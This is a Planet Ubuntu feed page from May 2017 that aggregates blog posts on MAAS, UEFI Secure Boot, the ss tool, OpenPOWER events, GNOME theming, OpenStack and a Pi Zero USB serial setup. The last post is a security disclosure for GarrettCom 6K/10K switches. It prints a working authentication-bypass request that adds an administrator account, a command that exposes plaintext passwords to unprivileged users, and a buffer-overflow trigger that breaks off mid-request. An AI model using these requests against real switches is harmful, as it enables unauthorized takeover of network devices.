25 May 2017

feedPlanet Ubuntu

Andres Rodriguez: MAAS 2.2.0 Released!

I'm happy to announce that MAAS 2.2.0 (final) has now been released, and it introduces quite a few exciting features:

For more information, please read the release notes are available here.

Availability
MAAS 2.2.0 is currently available in the following MAAS team PPA.
ppa:maas/next
Please note that MAAS 2.2 will replace the MAAS 2.1 series, which will go out of support. We are holding MAAS 2.2 in the above PPA for a week, to provide enough notice to users that it will replace 2.1 series. In the following weeks, MAAS 2.2 will be backported into Ubuntu Xenial.

25 May 2017 1:47pm GMT

24 May 2017

feedPlanet Ubuntu

Mathieu Trudel: An overview of UEFI Secure Boot on Ubuntu

Secure Boot is here

Ubuntu has now supported UEFI booting and Secure Boot for long enough that it is available, and reasonably up to date, on all supported releases. Here is how Secure Boot works.

An overview

I'm including a diagram here; I know it's a little complicated, so I will also explain how things happen (it can be clicked to get to the full size image).


In all cases, booting a system in UEFI mode loads UEFI firmware, which typically contains pre-loaded keys (at least, on x86). These keys are usually those from Microsoft so that Windows can load its own bootloader and verify it, as well as those from the computer manufacturer. The firmware doesn't, by itself, know anything special about how to boot the system -- this is something that is informed by NVRAM (or some similar memory that survives a reboot) by way of a few variables: BootOrder, which specified what order to boot things in, as well as BootEntry#### (hex numbers), which contains the path to the EFI image to load, a disk, or some other method of starting the computer (such as booting in the Setup tool for that firmware). If no BootEntry variable listed in BootOrder gets the system booting, then nothing would happen. Systems however will usually at least include a path to a disk as a permanent or default BootEntry. Shim relies on that, or on a distro, to load in the first place.

Once we actually find shim to boot; this will try to validate signatures of the next piece in the puzzle: grub2, MokManager, or fallback, depending on the state of shim's own variables in NVRAM; more on this later.

In the usual scenario, shim will validate the grub2 image successfully, then grub2 itself will try to load the kernel or chainload another EFI binary, after attempting to validate the signatures on these images by way of asking shim to check the signature.

Shim

Shim is just a very simple layer that holds on to keys outside of those installed by default on the system (since they normally can't be changed outside of Setup Mode, and require a few steps to do), and knows how to load grub2 in the normal case, as well as how to load MokManager if policy changes need to be applied (such as disabling signature validation or adding new keys), as well as knowing how to load the fallback binary which can re-create BootEntry variables in case the firmware isn't able to handle them. I will expand on MokManager and fallback in a future blog post.

Your diagram says shim is signed by Microsoft, what's up with that?

Indeed, shim is an EFI binary that is signed by Microsoft how we ship it in Ubuntu. Other distributions do the same. This is required because the firmware on most systems already contains Microsoft certificates (pre-loaded in the factory), and it would be impractical to have different shims for each manufacturer of hardware. All EFI binaries can be easily re-signed anyway, we just do things like this to make it as easy as possible for the largest number of people.

One thing this means is that uploads of shim require a lot of effort and testing. Fortunately, since it is used by other distributions too, it is a well-tested piece of code. There is even now a community process to handle review of submissions for signature by Microsoft, in an effort to catch anything outlandish as quickly and as early as possible.

Why reboot once a policy change is made or boot entries are rebuilt?

All of this happens through changes in firmware variables. Rebooting makes sure we can properly take into account changes in the firmware variables, and possibly carry on with other "backlogged" actions that need to happen (for instance, rebuilding BootEntry variables first, and then loading MokManager to add a new signing key before we can load a new grub2 image you signed yourself).

Grub2

grub2 is not a new piece of the boot process in any way. It's been around for a long while. The difference from booting in BIOS mode compared to in UEFI is that we install an UEFI binary version of grub2. The software is the same, just packaged slightly differently (I may outline the UEFI binary format at some point in the future). It also goes through some code paths that are specific to UEFI, such as checking if we've booting through shim, and if so, asking it to validate signatures. If not, we can still validate signatures, but we would have to do so using the UEFI protocol itself, which is limited to allowing signatures by keys that are included in the firmware, as expressed earlier. Mostly just the Microsoft signatures.

grub2 in UEFI otherwise works just like it would elsewhere: it try to find its grub.cfg configuration file, and follow its instructions to boot the kernel and load the initramfs.

When Secure Boot is enabled, loading the kernel normally requires that the kernel itself is signed. The kernels we install in Ubuntu are signed by Canonical, just like grub2 is, and shim knows about the signing key and can validate these signatures.

At the time of this writing, if the kernel isn't signed or is signed by a key that isn't known, grub2 will fall back to loading the kernel as a normal binary (as in not signed), outside of BootServices (a special mode we're in while booting the system, normally it's exited by the kernel early on as the kernel loads). Exiting BootServices means some special features of the firmware are not available to anything that runs afterwards, so that while things may have been loaded in UEFI mode, they will not have access to everything in firmware. If the kernel is signed correctly, then grub2 leaves the ExitBootServices call to be done by the kernel.

Very soon, we will stop allowing to load unsigned (or signed by unknown keys) kernels in Ubuntu. This is work in progress. This change will not affect most users, only those who build their own kernels. In this case, they will still be able to load kernels by making sure they are signed by some key (such as their own, and I will cover signing things in my next blog entry), and importing that key in shim (which is a step you only need to do once).

The kernel

In UEFI, the kernel enforces that modules loaded are properly signed. This means that for those who need to build their own custom modules, or use DKMS modules (virtualbox, r8168, bbswitch, etc.), you need to take more steps to let the modules load properly.

In order to make this as easy as possible for people, for now we've opted to let users disable Secure Boot validation in shim via a semi-automatic process. Shim is still being verified by the system firmware, but any piece following it that asks shim to validate something will get an affirmative response (ie. things are valid, even if not signed or signed by an unknown key). grub2 will happily load your kernel, and your kernel will be happy to load custom modules. This is obviously not a perfectly secure solution, more of a temporary measure to allow things to carry on as they did before. In the future, we'll replace this with a wizard-type tool to let users sign their own modules easily. For now, signature of binaries and modules is a manual process (as above, I will expand on it in a future blog entry).

Shim validation

To toggle shim validation, if you were using DKMS packages and feel you'd really prefer to have shim validate everything (but be aware that if your system requires these drivers, they will not load and your system may be unusable, or at least whatever needs that driver will not work):

sudo update-secureboot-policy --enable

If nothing happens, it's because you already have shim validation enabled: nothing has required that it be disabled. If things aren't as they should be (for instance, Secure Boot is not enabled on the system), the command will tell you.

And although we certainly don't recommend it, you can disable shim validation yourself with much the same command (see --help). There is an example of use of update-secureboot-policy here.

24 May 2017 8:07pm GMT

Ubuntu Insights: Redefining the Developer Event

By Randall Ross, Ubuntu Evangelist

We've all been to "those other" developer events: Sitting in a room watching a succession of never-ending slide presentations. Engagement with the audience, if any, is minimal. We leave with some tips and tools that we might be able to put into practice, but frankly, we attended because we were supposed to. The highlight was actually the opportunity to connect with industry contacts.

Key members of the OpenPOWER Foundation envisioned something completely different in their quest to create the perfect developer event, something that has never been done before: What if developers at a developer event actually spent their time developing?

The OpenPOWER Foundation is an open technical membership organization that enables its member companies to provide customized, innovative solutions based on POWER CPU processors and system platforms that encourage data centers to rethink their approach to technology. The Foundation found that ISVs needed support and encouragement to develop OpenPOWER-based solutions and take advantage of other OpenPOWER Ready components. The demand for OpenPOWER solutions has been growing, and ISVs needed a place to get started.

To solve this challenge, The OpenPOWER Foundation created the first ever Developer Congress, a hands-on event that will take place May 22-25 in San Francisco. The Congress will focus on all aspects of full stack solutions - software, hardware, infrastructure, and tooling - and developers will have the opportunity to learn and develop solutions amongst peers in a collaborative and supportive environment.

The Developer Congress will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. Experts in the latest hot technologies such as deep learning, machine learning, artificial intelligence, databases and analytics, and cloud will be on hand to provide one-on-one advice as needed.

As Event Co-Chair, I had an idea for a different type of event. One where developers are treated as "heroes" (because they are - they are the creators of solutions). My Event Co-Chair Greg Phillips, OpenPOWER Content Marketing Manager at IBM, envisioned an event where developers will bring their laptops and get their hands dirty, working under the tutelage of technical experts to create accelerated solutions.

The OpenPOWER Developer Congress is designed to provide a forum that encourages learning from peers and networking with industry thought leaders. Its format emphasises collaboration with partners to find complementary technologies, and provides on-site mentoring through liaisons assigned to help developers get the most out of their experience.

Support from the OpenPOWER Foundation doesn't end with the Developer Congress. The OpenPOWER Foundation is dedicated to providing its members with ongoing support in the form of information, access to developer tools and software labs across the globe, and assets for developing on OpenPOWER.

The OpenPOWER Foundation is committed to making an investment in the Developer Congress to provide an expert-rich environment that allows attendees to walk away three days later with new skills, new tools, and new relationships. As Thomas Edison said, "Opportunity is missed by most people because it is dressed in overalls and looks like work." So developers, come get your hands dirty.

Learn more about the OpenPOWER Developer Congress.

About the author

Randall Ross leads the OpenPOWER Ambassadors, and is a prominent Ubuntu community member. He hails from Vancouver BC, where he leads one of the largest groups of Ubuntu enthusiasts and contributors in the world.

24 May 2017 12:59pm GMT

Mathieu Trudel: ss: another way to get socket statistics

In my last blog post I mentioned ss, another tool that comes with the iproute2 package and allows you to query statistics about sockets. The same thing that can be done with netstat, with the added benefit that it is typically a little bit faster, and shorter to type.

Just ss by default will display much the same thing as netstat, and can be similarly passed options to limit the output to just what you want. For instance:

$ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 127.0.0.1:postgresql 127.0.0.1:48154
ESTAB 0 0 192.168.0.136:35296 192.168.0.120:8009
ESTAB 0 0 192.168.0.136:47574 173.194.74.189:https

[...]

ss -t shows just TCP connections. ss -u can be used to show UDP connections, -l will show only listening ports, and things can be further filtered to just the information you want.

I have not tested all the possible options, but you can even forcibly close sockets with -K.

One place where ss really shines though is in its filtering capabilities. Let's list all connections with a source port of 22 (ssh):

$ ss state all sport = :ssh
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:ssh *:*
tcp ESTAB 0 0 192.168.0.136:ssh 192.168.0.102:46540
tcp LISTEN 0 128 :::ssh :::*

And if I want to show only connected sockets (everything but listening or closed):

$ ss state connected sport = :ssh
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp ESTAB 0 0 192.168.0.136:ssh 192.168.0.102:46540


Similarly, you can have it list all connections to a specific host or range; in this case, using the 74.125.0.0/16 subnet, which apparently belongs to Google:

$ ss state all dst 74.125.0.0/16
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp ESTAB 0 0 192.168.0.136:33616 74.125.142.189:https
tcp ESTAB 0 0 192.168.0.136:42034 74.125.70.189:https
tcp ESTAB 0 0 192.168.0.136:57408 74.125.202.189:https

This is very much the same syntax as for iptables, so if you're familiar with that already, it will be quite easy to pick up. You can also install the iproute2-doc package, and look in /usr/share/doc/iproute2-doc/ss.html for the full documentation.

Try it for yourself! You'll see how well it works. If anything, I'm glad for the fewer characters this makes me type.

24 May 2017 12:54am GMT

23 May 2017

feedPlanet Ubuntu

Ubuntu Insights: Hacking Through Machine Learning at the OpenPOWER Developer Congress

By Sumit Gupta, Vice President, IBM Cognitive Systems

10 years ago, every CEO leaned over to his or her CIO and CTO and said, "we got to figure out big data." Five years ago, they leaned over and said, "we got to figure out cloud." This year, every CEO is asking their team to figure out "AI" or artificial intelligence.

IBM laid out an accelerated computing future several years ago as part of our OpenPOWER initiative. This accelerated computing architecture has now become the foundation of modern AI and machine learning workloads such as deep learning. Deep learning is so compute intensive that despite using several GPUs in a single server, one computation run of deep learning software can take days, if not weeks, to run.

The OpenPOWER architecture thrives on this kind of compute intensity. The POWER processor has much higher compute density than x86 CPUs (there are up to 192 virtual cores per CPU socket in Power8). This density per core, combined with high-speed accelerator interfaces like NVLINK and CAPI that optimize GPU pairing, provides an exponential performance benefit. And the broad OpenPOWER Linux ecosystem, with 300+ members, means that you can run these high-performance POWER-based systems in your existing data center either on-prem or from your favorite POWER cloud provider at costs that are comparable to legacy x86 architectures.

Take a Hack at the Machine Learning Work Group

The recently formed OpenPOWER Machine Learning Work Group gathers experts in the field to focus on the challenges that machine learning developers are continuously facing. Participants identify use cases, define requirements, and collaborate on solution architecture optimisations. By gathering in a workgroup with a laser focus, people from diverse organisations can better understand and engineer solutions that address similar needs and pain points.

The OpenPOWER Foundation pursues technical solutions using POWER architecture from a variety of member-run work groups. The Machine Learning Work Group is a great example of how hardware and software can be leveraged and optimized across solutions that span the OpenPOWER ecosystem.

Accelerate Your Machine Learning Solution at the Developer Congress

This spring, the OpenPOWER Foundation will host the OpenPOWER Developer Congress, a "get your hands dirty" event on May 22-25 in San Francisco. This unique event provides developers the opportunity to create and advance OpenPOWER-based solutions by taking advantage of on-site mentoring, learning from peers, and networking with developers, technical experts, and industry thought leaders. If you are a developer working on Machine Learning solutions that employ the POWER architecture, this event is for you.

The Congress is focused full stack solutions - software, firmware, hardware infrastructure, and tooling. It's a hands-on opportunity to ideate, learn, and develop solutions in a collaborative and supportive environment. At the end of the Congress, you will have a significant head start on developing new solutions that utilize OpenPOWER technologies and incorporate OpenPOWER Ready products.

There has never been another event like this one. It's a developer conference devoted to developing, not sitting through slideware presentations or sales pitches. Industry experts from the top companies that are innovating in deep learning, machine learning, and artificial intelligence will be on hand for networking, mentoring, and providing advice.

A Developer Congress Agenda Specific to Machine Learning

The OpenPOWER Developer Congress agenda addresses a variety of Machine Learning topics. For example, you can participate in hands-on VisionBrain training, learning a new model and generating the API for image classification, using your own family pictures to train the model. The current agenda includes:

• VisionBrain: Deep Learning Development Platform for Computer Vision
• GPU Programming Training, including OpenACC and CUDA
• Inference System for Deep Learning
• Intro to Machine Learning / Deep Learning
• Develop / Port / Optimize on Power Systems and GPUs
• Advanced Optimization
• Spark on Power for Data Science
• Openstack and Database as a Service
• OpenBMC

Bring Your Laptop and Your Best Ideas

The OpenPOWER Developer Congress will take place May 22-25 in San Francisco. The event will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. So bring your laptop and preferred development tools and prepare to get your hands dirty!

About the author

Sumit Gupta is Vice President, IBM Cognitive Systems, where he leads the product and business strategy for HPC, AI, and Analytics. Sumit joined IBM two years ago from NVIDIA, where he led the GPU accelerator business.

23 May 2017 9:31am GMT

Marco Trevisan (Treviño): Ubuntu goes GNOME, theming stays. Let’s test (and tune) it!

Hi guys! Again… Long time, no see you :-).

As you surely know, in the past weeks Ubuntu took the hard decision of stopping the development of Unity desktop environment, focusing again in shipping GNOME as default DE, and joining the upstream efforts.

While, in a personal note, after more than 6 years of involvement in the Unity development, this is a little heartbreaking, I also think that given the situation this is the right decision, and I'm quite excited to be able to work even closer to the whole opensource community!

Most of the aspects of the future Ubuntu desktop have to be defined yet, and I guess you know that there's a survey going on I encourage you to participate in order to make your voice count…

One important aspect of this, is the visual appearance, and the Ubuntu Desktop team has decided that the default themes for Ubuntu 17.10 will continue to be the ones you always loved! Right now some work is being done to make sure Ambiance and Radiance look and work good in GNOME Shell.

In the past days I've released a new version of 'light-themes' to fix several theming problems in GNOME Shell.


This is already quite an improvement, but we can't fix bugs we don't know about… So this is where you can help make Ubuntu better!

Get Started

If you haven't already, here's how I recommend you get started.
Install the latest Ubuntu 17.10 daily image (if not going wild and trying this in 17.04).
After installing it, install gnome-shell.
Install gnome-tweak-tool if you want an easy way to change themes.
On the login screen, switch your session to GNOME and log in.

Report Bugs

Run this command to report bugs with Ambiance or Radiance:

ubuntu-bug light-themes

Attach a screenshot to the Launchpad issue.

Other info

Ubuntu's default icon theme is ubuntu-mono-dark (or -light if you switch to Radiance) but most of Ubuntu's customized icons are provided by humanity-icon-theme.

Helping with Themes development

If you want to help with the theming itself, you're very welcome. Gtk themes are nowadays using CSS, so I'm pretty sure that any Web designer out there can help with them (these are the supported properties).

All you have to do, is simply use the Gtk Inspector that can be launched from any Gtk3 app, and write some CSS rules and see how they get applied on the fly. Once you're happy with your solution, you can just create a MP for the Ubuntu Themes.

Let's keep ubuntu, look ubuntu!

PS: thanks to Jeremy Bicha for the help in this post.

23 May 2017 5:20am GMT

Aaron Honeycutt: Current Layout: Kubuntu 17.10 – 5/22/17

I've been running Artful aka 17.10 on my laptop for maybe a month now with no real issues and thats thanks to the awesome Kubuntu developers we have and our testers!

My Current layout has Latte Dock running with a normal panel (yes a bit Mac-y I know). I had to build Latte Dock for myself in Launchpad[1] so if you want to use it on 17.10 with the normal PPA/testing warning, I also have it built for 17.04 if anyone wants that as well[2]. I'm also running the new Qt music player Babe-Qt.

I also have the Uptime widget and a launcher widget in the Latte Dock as it can hold widgets just like a normal panel. Oh and the wallpaper is from awesome game Firewatch (it's on Linux!)

[1] https://launchpad.net/~aaronhoneycutt/+archive/ubuntu/artful
[2] https://launchpad.net/~aaronhoneycutt/+archive/ubuntu/kubuntu-zetsy

23 May 2017 3:40am GMT

22 May 2017

feedPlanet Ubuntu

Adam Stokes: conjure-up dev summary for week 20

conjure-up dev summary for week 20

conjure-up dev summary for week 20 conjure-up dev summary for week 20 conjure-up dev summary for week 20

This week we concentrated on polishing up our region and credentials selection capabilities.

Initially, we wanted people deploying big software as fast as possible without it turning into a "choose your own adventure" book. This has been hugely successful as it minimized time and effort to getting to that end result of a usable Kubernetes or OpenStack.

Now fast forward a few months and feature requests were coming in wanting to expand on this basic flow of installing big software. Our first request was to add the ability to specify regions where this software would live, that feature is complete and is known as region selections:

Region Selections

Region selection is supported in both Juju as a Service (JAAS) and as a self hosted controller.

conjure-up dev summary for week 20

In this example we are using JAAS to deploy Canonical Distribution of Kubernetes to the us-east-2 region in AWS:

conjure-up dev summary for week 20

conjure-up will already know what regions are available and will prompt you with that list:

conjure-up dev summary for week 20

Finally, input your credentials and off it goes to having a fully usable Kubernetes cluster in AWS.

conjure-up dev summary for week 20

The credentials view leads us into our second completed feature. Multiple user credentials are supported for all the various clouds and previously conjure-up tried to do the right thing if an existing credential for a cloud was found. Again, in the interest of getting you up and running as fast as possible conjure-up would re-use any credentials it found for the cloud in use. This worked well initially, however, as usage increased so did the need for being able to choose from a list of existing credentials or create your own. That feature work has been completed and will be available in conjure-up 2.2.

Credential Selection

This screen shows you a list of existing credentials that were created for AWS or gives you the option of creating additional ones:

conjure-up dev summary for week 20

Trying out the latest

As always we keep our edge releases current with the latest from our code. If you want to help test out these new features simply run:

sudo snap install conjure-up --classic --edge  
conjure-up  

That's all for this week, check back next week for more conjure-up news!

22 May 2017 4:19pm GMT

James Page: Ubuntu OpenStack Dev Summary – 22nd May 2017

Welcome to the first ever Ubuntu OpenStack development summary!

This summary is intended to be a regular communication of activities and plans happening in and around Ubuntu OpenStack, covering but not limited to the distribution and deployment of OpenStack on Ubuntu.

If there is something that you would like to see covered in future summaries, or you have general feedback on content please feel free to reach out to me (jamespage on Freenode IRC) or any of the OpenStack Engineering team at Canonical!


OpenStack Distribution

Stable Releases

Ceph 10.2.7 for Xenial, Yakkety, Zesty and Trusty-Mitaka UCA:
https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/1684527

Open vSwitch updates (2.5.2 and 2.6.1) for Xenial and Yakkety plus associated UCA pockets:
https://bugs.launchpad.net/ubuntu/+source/openvswitch/+bug/1673063
https://bugs.launchpad.net/ubuntu/+source/openvswitch/+bug/1641956

Point releases for Horizon (9.1.2) and Keystone (9.3.0) for Xenial and Trusty-Mitaka UCA:
https://bugs.launchpad.net/ubuntu/+source/keystone/+bug/1680098

And the current set of OpenStack Newton point releases have just entered testing:
https://bugs.launchpad.net/cloud-archive/+bug/1688557

Development Release

OpenStack Pike b1 is available in Xenial-Pike UCA (working through proposed testing in Artful).

Open vSwitch 2.7.0 is available in Artful and Xenial-Pike UCA.

Expect some focus on development previews for Ceph Luminous (the next stable release) for Artful and the Xenial-Pike UCA in the next month.


OpenStack Snaps

Progress on producing snap packages for OpenStack components continues; snaps for glance, keystone, nova, neutron and nova-hypervisor are available in the snap store in the edge channel - for example:

sudo snap install --edge --classic keystone

Snaps are currently Ocata aligned; once the team have a set of snaps that we're all comfortable are a good base, we'll be working towards publication of snaps across tracks for OpenStack Ocata and OpenStack Pike as well as expanding the scope of projects covered with snap packages.

The edge channel for each track will contain the tip of the associated branch for each OpenStack project, with the beta, candidate and release channels being reserved for released versions. These three channels will be used to drive the CI process for validation of snap updates. This should result in an experience something like:

sudo snap install --classic --channel=ocata/stable keystone

or

sudo snap install --classic --channel=pike/edge keystone

As the snaps mature, the team will be focusing on enabling deployment of OpenStack using snaps in the OpenStack Charms (which will support CI/CD testing) and migration from deb based installs to snap based installs.


Nova LXD

Support for different Cinder block device backends for Nova-LXD has landed into driver (and the supporting os-brick library), allowing Ceph Cinder storage backends to be used with LXD containers; this is available in the Pike development release only.

Work on support for new LXD features to allow multiple storage backends to be used is currently in-flight, allowing the driver to use dedicated storage for its LXD instances alongside any use of LXD via other tools on the same servers.


OpenStack Charms

6 monthly release cycle

The OpenStack Charms project is moving to a 6 monthly release cadence (rather than the 3 month cadence we've followed for the last few years); This reflects the reduced rate of new features across OpenStack and the charms, and the improved process for backporting fixes to the stable charm set between releases. The next charm release will be in August, aligned with the release of OpenStack Pike and the Xenial Pike UCA.

If you have bugs that you'd like to see backported to the current stable charm set, please tag them with the 'stable-backport' tag (and they will pop-up in the right place in Launchpad) - you can see the current stable bug pipeline here.

Ubuntu Artful and OpenStack Pike Support

Required changes into the OpenStack Charms to support deployment of Ubuntu Artful (the current development release) and OpenStack Pike are landing into the development branches for all charms, alongside the release of Pike b1 into Artful and the Xenial-Pike UCA.

You can consume these charms (as always) via the ~openstack-charmers-next team, for example:

juju deploy cs:~openstack-charmers-next/keystone

IRC (and meetings)

You can participate in the OpenStack charm development and discussion by joining the #openstack-charms channel on Freenode IRC; we also have a weekly development meeting in #openstack-meeting-4 at either 1000 UTC (odd weeks) or 1700 UTC (even weeks) - see http://eavesdrop.openstack.org/#OpenStack_Charms for more details.

EOM


22 May 2017 11:00am GMT

21 May 2017

feedPlanet Ubuntu

Costales: Ubuntu y otras hierbas S01E02: GNOME3 y UBPorts [podcast] [spanish]

Segundo capítulo del podcast Ubuntu y otras hierbas.

En esta ocasión:
Charlaremos sobre estos temas:
  • Migración a GNOME 3
  • UBPorts mantendrá Unity y Ubuntu Phone
El podcast está disponible para escuchar en:


Podcast en Youtube

Links relacionados al podcast:
Banda sonora del podcast bajo licencia CC BY-NC 4.0.
Vídeo de Marius en la Ubucon sobre UBPorts.

Todos los capítulos del podcast 'Ubuntu y otras hierbas' disponibles aquí.

21 May 2017 11:50am GMT

David Tomaschik: Pi Zero as a Serial Gadget

I just got a new Raspberry Pi Zero W (the wireless version) and didn't feel like hooking it up to a monitor and keyboard to get started. I really just wanted a serial console for starters. Rather than solder in a header, I wanted to be really lazy, so decided to use the USB OTG support of the Pi Zero to provide a console over USB. It's pretty straightforward, actually.

Install Raspbian on MicroSD

First off is a straightforward "install" of Raspbian on your MicroSD card. In my case, I used dd to image the img file from Raspbian to a MicroSD card in a card reader.

1
dd if=/home/david/Downloads/2017-04-10-raspbian-jessie-lite.img of=/dev/sde bs=1M conv=fdatasync

Mount the /boot partition

You'll want to mount the boot partition to make a couple of changes. Before doing so, run partprobe to re-read the partition tables (or unplug and replug the SD card). Then mount the partition somewhere convenient.

1
2
partprobe
mount /dev/sde1 /mnt/boot

Edit /boot/config.txt

To use the USB port as an OTG port, you'll need to enable the dwc2 device tree overlay. This is accomplished by adding a line to /boot/config.txt with dtoverlay=dwc2.

1
2
vim /mnt/boot/config.txt
(append dtoverlay=dwc2)

Edit /boot/cmdline.txt

Now we'll need to tell the kernel to load the right module for the serial OTG support. Open /boot/cmdline.txt, and after rootwait, add modules-load=dwc2,g_serial.

1
2
vim /mnt/boot/cmdline.txt
(insert modules-load=dwc2,g_serial after rootwait)

When you save the file, make sure it is all one line, if you have any line wrapping options they may have inserted newlines into the file.

Mount the root (/) partition

Let's switch the partition we're dealing with.

1
2
umount /mnt/boot
mount /dev/sde2 /mnt/root

Enable a Console on /dev/ttyGS0

/dev/ttyGS0 is the serial port on the USB gadget interface. While we'll get a serial port, we won't have a console on it unless we tell systemd to start a getty (the process that handles login and starts shells) on the USB serial port. This is as simple as creating a symlink:

1
ln -s /lib/systemd/system/getty@.service /mnt/root/etc/systemd/system/getty.target.wants/getty@ttyGS0.service

This asks systemd to start a getty on ttyGS0 on boot.

Unmount and boot your Pi Zero

Unmount your SD card, insert the micro SD card into a Pi Zero, and boot with a Micro USB cable between your computer and the OTG port.

Connect via a terminal emulator

You can connect via the terminal emulator of your choice at 115200bps. The Pi Zero shows up as a "Netchip Technology, Inc. Linux-USB Serial Gadget (CDC ACM mode)", which means that (on Linux) your device will typically be /dev/ttyACM0.

1
screen /dev/ttyACM0 115200

Conclusion

This is a quick way to get a console on a Raspberry Pi Zero, but it has downsides:

21 May 2017 7:00am GMT

19 May 2017

feedPlanet Ubuntu

Nish Aravamudan: usd has been renamed to git-ubuntu

After some internal bikeshedding, we decided to rework the tooling that the Server Team has been working on for git-based source package management. The old tool was usd (Ubuntu Server Dev), as it stemmed from a Canonical Server sprint in Barcelona last year. That name is confusing (acronyms that aren't obvious are never good) and really the tooling had evolved to be a git wrapper.

So, we renamed everything to be git-ubuntu. Since git is awesome, that means git ubuntu also works as long as git-ubuntu is in your $PATH. The snap (previously usd-nacc) has been deprecated in favor of git-ubuntu (it still exists, but if you try to run, e.g., usd-nacc.usd you are told to install the git-ubuntu snap). To get it, use:

sudo snap install --classic git-ubuntu

We are working on some relatively big changes to the code-base to release next week:

  1. Empty directory support (LP: #1687057). My colleague Robie Basak implemented a workaround for upstream git not being able to represent empty directories.
  2. Standardizing (internal to the code) how the remote(s) work and what refspecs are used to fetch from them.

Along with those architectural changes, one big functional shift is to using git-config to store some metadata about the user (specifically, the Launchpad user name to use, in ~/.gitconfig) and the command used to create the repository (specifically, the source package name, in <dir>/.git/config). I think this actually ends up being quite clean from an end-user perspective, and it means our APIs and commands are easier to use, as we can just lookup this information from git-config when using an existing repository.

As always, the latest code is at: https://git.launchpad.net/usd-importer


19 May 2017 10:45pm GMT

Jos Antonio Rey: Social Media Management vs. Community Management?

I personally stopped blogging a while ago, but I kinda feel this is a necessary blog post. A while ago, a professor used the term Community Manager interchangeably with Social Media Manager. I made a quick comment about them not being the same, and later some friends started questioning my reasoning.

Last week during OSCON, I was chatting with a friend about this same topic. A startup asked me to help them as a community manager about a year ago. I gladly accepted, but then they just started assigning me social media work.

And these are not the only cases. I have seen several people use both terms interchangeably, which they are not. I guess it's time for me to burst the bubble that has been wrapped around both terms.

In order to do that, let's explain, in very simple words, the job of both of them. Let's start with the social media managers. Their job is, as the title says, to manage social media channels. Post on Facebook, respond to Twitter replies, make sure people feel welcome when they visit any of the social media channels, and automatically represent the brand/product through social media.

Community managers, on the other side, focus on building communities around a product or service. To put it simpler, they make sure that there's people that care about the product, that contribute to the ecosystem, that work with the provider to make it better. Social media management is a part of their job. It is a core function, because it is one of the channels that allow them to communicate with people to hear their concerns and project the provider's voice about the product. However, it is not their only job. They also have to go out and meet with people, in real life. Talk with higher-ups to voice the concerns. Hear how the product is impacting people's life in order to make a change, or continue on the same good path.

With this, I'm not trying to devalue the work of social media managers. On the other hand, they are have a very valuable job. Imagine all those companies with social media profiles, without the funny comments. No message replies if you had a question. Horrible, right? Managing these channels is as important, so brands/products are 'alive' on the interwebs. Being a community manager is not only managing a channel. Therefore, they are not comparable jobs.

Each of the positions is different, even though they complement each other pretty well. But I hope that with this post you can understand a little bit more about the inside job of both community managers and social media managers. In a fast-paced world like ours today, these two can make a huge difference between having a presence online, or not. So, next time, if you're looking for a community manager, don't expect them to do only social media work. And viceversa - if you're looking for a social media manager, don't expect them to build community out of social media.


19 May 2017 5:02pm GMT

Martin Pitt: Cockpit is now in Ubuntu backports

Hot on the heels of landing Cockpit in Debian unstable and Ubuntu 17.04, the Ubuntu backport request got approved (thanks Iain!), which means that installing cockpit on Ubuntu 16.04 LTS or 16.10 is now also a simple apt install cockpit away. I updated the installation instructions accordingly.

Enjoy, and let us know about problems!

19 May 2017 2:49pm GMT

David Tomaschik: Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption

Introduction

Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT (Magnum) series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that GarrettCom undertake a full whitebox security assessment of these switches.

The version under test was indicated as: 4.6.0. Belden Garrettcom released an advisory on 8 May 2017, indicating that issues were fixed in 4.7.7: http://www.belden.com/docs/upload/Belden-GarrettCom-MNS-6K-10K-Security-Bulletin-BSECV-2017-8.pdf

This is a local copy of an advisory posted to the Full Disclosure mailing list.

GarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token

Severity: High

The string "GoodKey" can be used in place of a session token for the web interface, allowing a complete bypass to all web interface authentication. The following request/response demonstrates adding a user 'gibson' with the password 'god' on any GarrettCom 6K or 10K switch.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey HTTP/1.1
Host: 192.168.0.2
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: */*
Referer: https://192.168.0.2/gc/flash.php
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8


HTTP/1.0 200 OK
Server: GoAhead-Webs
Content-Type: text/html

<?xml version='1.0' encoding='UTF-8'?><data val="users"><changed val="yes" />
<helpfile val="user_accounts.html" />
<user uid="operator" access="Operator" />
<user uid="manager" access="Manager" />
<user uid="gibson" access="Manager" />
</data>

GarrettCom-02 - Secrets Accessible to All Users

Severity: High

Unprivileged but authenticated users ("operator" level access) can view the plaintext passwords of all users configured on the system, allowing them to escalate privileges to "manager" level. While the default "show config" masks the passwords, executing "show config saved" includes the plaintext passwords. The value of the "secrets" setting does not affect this.

1
2
3
4
5
6
7
6K>show config group=user saved
...
#User Management#
user
add user=gibson level=2 pass=god
Exit
...

GarrettCom-03 - Stack Based Buffer Overflow in HTTP Server

Severity: High

When rendering the /gc/flash.php page, the server performs URI encoding of the Host header into a fixed-length buffer on the stack. This decoding appears unbounded and can lead to memory corruption, possibly including remote code execution. Sending garbage data appears to hang the webserver thread after responding to the present request. Requests with Host headers longer than 220 characters trigger the observed behavior.

1
2
3
4
5
6
7
8
9
GET /gc/flash.php HTTP/1.1
